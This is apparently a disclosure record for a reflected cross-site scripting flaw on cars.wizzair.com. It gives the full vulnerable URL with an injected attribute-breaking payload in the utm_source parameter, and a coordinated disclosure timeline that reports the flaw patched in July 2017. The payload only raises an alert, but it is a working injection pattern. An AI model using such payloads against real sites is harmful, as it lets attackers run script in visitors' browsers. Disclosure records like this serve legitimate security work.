logo
DATABASE RESOURCES PRICING ABOUT US

cars.wizzair.com XSS vulnerability

Description

##### Vulnerable URL: http://cars.wizzair.com/Home.do?utm_source=%22%20accesskey=x%20onclick=%22alert(/XSSPOSED/)&utm;_medium=xxx&utm;_campaign=xxx ##### Details: Description| Value ---|--- Patched:| Yes, at 28.07.2017 Latest check for patch:| 28.07.2017 14:09 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| Unknown / Not calculated VIP website status:| No Check cars.wizzair.com SSL connection:| (Grade: A+) ##### Coordinated Disclosure Timeline: Description| Value ---|--- Vulnerability submitted via Open Bug Bounty| 20 January, 2017 18:08 GMT Generic security notifications sent to website owner| 20 January, 2017 18:11 GMT Notification sent to subscribers (without technical details)| 20 January, 2017 22:17 GMT Vulnerability details disclosed by researcher| 3 February, 2017 18:14 GMT Vulnerability patched by the website owner| 28 July, 2017 14:09 GMT